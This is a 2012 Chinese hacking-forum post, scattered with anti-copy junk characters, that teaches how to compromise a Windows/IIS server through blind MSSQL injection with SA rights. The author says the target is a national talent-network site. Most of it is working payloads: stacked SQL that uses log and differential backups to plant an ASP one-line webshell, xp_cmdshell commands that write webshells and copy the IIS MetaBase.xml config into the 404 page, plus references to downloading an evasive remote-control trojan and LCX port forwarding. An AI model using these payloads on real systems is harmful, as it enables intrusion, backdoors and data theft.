中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]
作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————/ D. W* v2 j2 \7 y3 L# n& P2 D9 d

  q; P8 S) K' d( T
: X: p8 x( Y: z                                                             欢迎高手访问指导,欢迎新手朋友交流学习。  i/ _8 i$ d; M" S
1 l" W2 N8 a; l& l5 e
                                                                 $ w+ a5 u/ k! z
                                                                 
* Z3 a& \7 g1 U% }+ o                                                                  论坛: http://www.90team.net/! f; g8 ^9 Y: M

, q0 |3 i; D& C8 B( r' \6 l# {7 ^: I  _

1 ~3 B, T2 Q  |友情检测国家人才网
# J' K& @9 q; N/ ^6 a
! w9 x- S2 o1 @( A' q6 @! }7 y6 [& o8 r
内容:MSSQL注入SA权限不显错模式下的入侵
. h- H9 @5 t, @7 Y/ ^+ }- W
+ l1 O5 g- a  c/ B  J- a6 v; P5 Z0 X* r: ^" a, D. u. J/ ^
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。7 J% b" v+ ], W; g+ a2 o

$ e! c& a6 x5 U! U9 i9 v2 x% ]0 l我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
% e0 l* d- Z# `9 v  }$ f% G& ]. W  X6 ^" m* \

3 p6 ?$ b- R: M这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
3 J) s% v/ C4 h0 L' n7 y: N' t* `/ x# [9 M7 t# s+ y
思路:% J, a/ F* Z1 Y5 ~3 E9 E
; ~7 i  u: P8 |1 \6 z
首先:
; s, O- Q  ~' c! m; \# l
0 Y9 o( {3 i8 U) G) p通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。  G+ F* o3 P- K' X9 Q
2 |+ V6 l5 K! k- D( z! Y9 L
1.日志备份获得Webshell/ _: o9 m- x  ?
0 ~; z. ]1 t* `4 [! Z* m- }+ Z) F
2.数据库差异备份获得Webshell; k/ l* t* S9 ~- `1 |3 V
8 u7 v( J  d$ B+ S) H# z% m) I
4.直接下载免杀远控木马。
8 @  l- ^, c. f. S5 t# t5 k! w1 o2 v$ Q- E; E( {5 j
5.直接下载LCX将服务器端口转发出来6 o3 E8 [  l7 I& p5 R

* O% [) K- H5 \4 G5 \! D) f6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
7 o* c/ p( \: v3 o1 L7 Z
3 o9 l# p( j* q
3 E$ K: c' Y9 s2 Y) G9 U- D$ _* E$ v3 c$ E, ?5 w  x) Q" P9 `
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
8 i- O' R0 A% a0 d
% R+ }! |8 m4 y( z5 G我直接演示后面一个方法
( C4 y: g% H) L) k7 @9 m
$ E! N. r  V  o2 ^. Y8 Q3 n/ E# F5 q3 j: t" v( f2 W$ m
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 0 L& I. E" G8 X5 Q+ |% _* g+ X4 C* U

# r! U' b! y& d3 `) [8 B
# x$ c  V* P2 n+ I3 l2 v1 Z, ?- f# N( e. k5 h" l

1 I  p8 T/ h  d" C1 X◆日志备份:
3 b% U8 H" ?& S1 z1 x: g! L1 [$ n, n& n

3 K# T9 V4 x! f+ P9 N, K1. 进行初始备份5 _1 `% `4 J9 T" B
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
8 c9 k% A% ?0 U  S, }3 ~  J! J, R. z% K
2. 插入数据; q8 K' k- h! j  ?5 e% o& O, \2 _
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
) B+ Y0 r* ], k1 A% \3 \: o. l
  t3 o5 K& z* [! D& ?2 c9 N0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
& ~8 [$ w9 V1 M  M+ u  
" K/ V2 Y' o9 L6 S! M- I: Q8 Z3. 备份并获得文件,删除临时表9 l$ V5 ^% c6 M5 j
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
" D3 f+ D3 |! Q: P  n+ |/ G
: q$ X# C; \0 J4 B: C7 D! t2 y% q! r6 g: I5 Q1 @6 W& [
3 k4 _2 s4 v" q/ ^7 l( r) L
◆数据库差异备份
7 f' `( |. I$ {" `! _& x3 v$ f' K4 a6 V* B, J7 T  q
(1. 进行差异备份准备工作
6 Q, u* w3 n$ U' u9 [6 B$ f
) L+ U7 z. N5 k' Q3 H! `" O& e0 e;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
9 f* O# T/ h4 i# n; w/ y) ^- v1 E
/ X9 A) L8 U( I! K) U上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码" x, o! g6 B  h" I& b- z  o

3 r: o# m% ]: ~# B+ B2 Y/ D. n4 q+ M" E& P. A
(2. 将数据写入到数据库, ^3 j* _) F5 [. u% F6 j
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
* ?* ?& }! G" D3 W! v% L5 b; r* x) B  `
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
. b1 r! h4 m! C$ [  V: D1 Y2 g) _5 }4 X9 D, [
3. 备份数据库并清理临时文件" o( X, p6 Q$ w4 I0 o

5 W, v6 Q2 {, @;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
# I+ T/ T/ T3 |) A. e
& a1 }. k( z3 @# x8 C7 `0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 3 l9 {4 u$ N: K+ |& {" X

% h' u$ ^3 _" P' O3 V! w, I( j5 O# U' B5 f$ }
) j& ~- r* b; e4 o/ [
用^转义字符来写ASP(一句话木马)文件的方法:   
1 B" T% i8 k0 g. d, |# z. b* u7 h# C& q7 F0 m2 `
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--' {/ I) V$ O- `5 b

* p9 D! K& a7 w2 x5 v* r, U0 y+ u2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp ( J# |5 q$ c1 @5 D& L% [  j3 k

+ H5 ?/ j- A" b! [+ }读取IIS配置信息获取web路径
1 d* C' ]: o' L- [  l2 o* u
+ J+ d+ C. `- g# O' s7 S$ X7 I     " R0 R' {' @% b1 y/ h; w& G' Z9 c
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
1 Q' v4 x1 A  N& D( x& g( r5 f1 J/ [: ~
执行命令7 ]: ~2 u  t2 l7 D) o: e4 F& j
     : l" U6 K( m7 C8 E" r
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
; [# z3 b0 B; [" j+ u3 j" a4 t1 ~4 A7 t( y

( k3 T( K, U5 e& d/ |* I2 Z. w
* c% o3 P! y& `/ N8 e6 j  a! i
" o* |$ j" v6 |4 ]  i7 j6 r7 u( E' @* u# F* d1 P4 v
1 g1 s; U1 Y' ^+ u% g
- Y5 W2 b7 T- n4 l" w  A2 V
9 V* _" V/ E( R) Z) M

) t  a# }4 B: ^! F  l# R
6 q# i3 `  s/ B! h( l% |& Y4 d" n/ r- Q6 ~8 \1 R

, a" I5 U/ x" U1 g/ z2 s, q; b- [$ |
- N$ t6 u8 K, Y2 P% |5 f# J; o5 v. M# w: v- o0 t( P

9 W  y% S- P" u) k( s1 ^; p' V) d- e7 f: b( w: b2 s

% q8 n- v! J( F8 m$ T( {( |( ]# h! E, A+ m( c, `9 t! |: E3 G/ x

. Q. u+ X* o, o: V
4 o) Q! s/ A3 K9 \! s2 o3 v' ^; C4 o' q$ K  c0 j: V" a; Z7 H- i

* F4 M. S( U  c8 C$ `" y) |$ a8 [% B4 h$ D- u9 U. H
1 |- R- h  k$ g; ~7 e' h8 [+ `; p
6 t9 y8 J& p# T, V2 Y" S+ X8 ~
3 q" B, \' w% J2 F& H* e3 |

) j7 c4 z) G- l; y- g
; V. r: f5 @" `/ |
" d0 O1 g, i2 J( g$ i& _* j' y
3 ~6 \" I0 G7 K" H# ^2 c
& }; d( J  q, D% O8 \9 |* s4 S/ h; W( C
1 B! u' b! ~2 `* X" k* l; p

4 X- h" K0 u  a' o
8 }* v+ d+ h, E3 w! V* y
+ @8 D2 n' Y8 d- n$ V# p, J
, M) v) m- S2 ?! x/ u% I6 ?  I; V; o; L0 K# v0 A

$ z8 A1 C) [  J) F$ `7 l8 [5 _' }# l% H* F, H
- u( W5 x6 Z1 V5 u
5 y6 [3 R; g9 u
0 u6 `; e  ^$ A; \* E/ c0 h
6 \. w2 T: }# s8 B1 `' G: p
1 k+ W3 U" F1 T
. E  t# Q2 E7 N. u+ ~
5 w% I4 {& r" d; z# Y! r& ?
$ L! t/ a4 f% D% I6 P7 h




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2